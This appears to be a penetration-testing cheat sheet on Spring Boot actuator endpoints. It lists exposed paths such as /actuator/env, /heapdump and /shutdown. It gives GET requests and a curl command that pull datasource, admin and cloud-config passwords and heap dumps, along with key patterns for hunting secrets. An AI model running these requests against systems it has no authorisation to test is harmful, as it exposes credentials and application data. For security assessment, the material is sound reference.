Spring-Boot
Open-source Java framework used for Spring-based applications
Querying tricks
Using Property Patterns
spring.datasource.url
spring.datasource.username
spring.datasource.passwordYou can use these patterns in two ways:
/actuator/env/spring.datasource.password/actuator/configprops/spring.datasourceEnvironment Variable
Spring Boot automatically maps environment variables to its property format following these rules:
Uppercase letters
Replace dots with underscores
Replace hyphens with underscores
Remove special characters
/actuator/env/SPRING_DATASOURCE_PASSWORDActuators
Actuators are management endpoints, those are the most important for you:
/actuator/health and /actuator/info are public available
/dumpor/threaddump- Exposes data in memory./traceor/httptrace- Shows recentHTTPrequests./logfile- Exposes application log files./envor/actuator/env- Reveals environment variables, configuration properties, and system settings./mappings- Shows all URL mappings and endpoints./heapdump- Downloads a heap dump file containing all objects in memory./shutdown- Allows remote shutdown of the application/restart- Allows remote restart of the application
SecLists has a great wordlist: Javascript-Spring-Boot
Enumeration
From
/actuator/beans, identify interesting componentsFrom
/actuator/configprops, find configuration for those componentsFrom
/actuator/env, find the actual values
Configuration Discovery with /actuator/env
Look for interesting patterns:
Database properties (
spring.datasource.*)Security properties (
spring.security.*)Cloud properties (
spring.cloud.*)
GET /actuator/configprops/spring.datasourceGET /actuator/env/spring.datasource.url
GET /actuator/env/spring.datasource.username
GET /actuator/env/spring.datasource.passwordGET /actuator/env/app.admin.username
GET /actuator/env/app.admin.password"spring.cloud.config.uri"
"spring.cloud.config.username"
"spring.cloud.config.password"Try Different content types
application/vnd.spring-boot.actuator.v3+jsonapplication/json Automate this key patterns
spring.security.*
*.password
*.secret
*.key
*.credential
*.token
spring.datasource.*
spring.jpa.*
spring.mongodb.*
spring.redis.*
spring.cloud.*
eureka.*
consul.*
vault.*
app.*
application.*
[application-name].*CVE-2025-48927 - /heapdump exposed - Initialization of a Resource with an Insecure Default
curl -X GET http://IP/actuator/heapdumpUse VisualVM took at the files from the dump comfortably
Read this article from Wiz
Last updated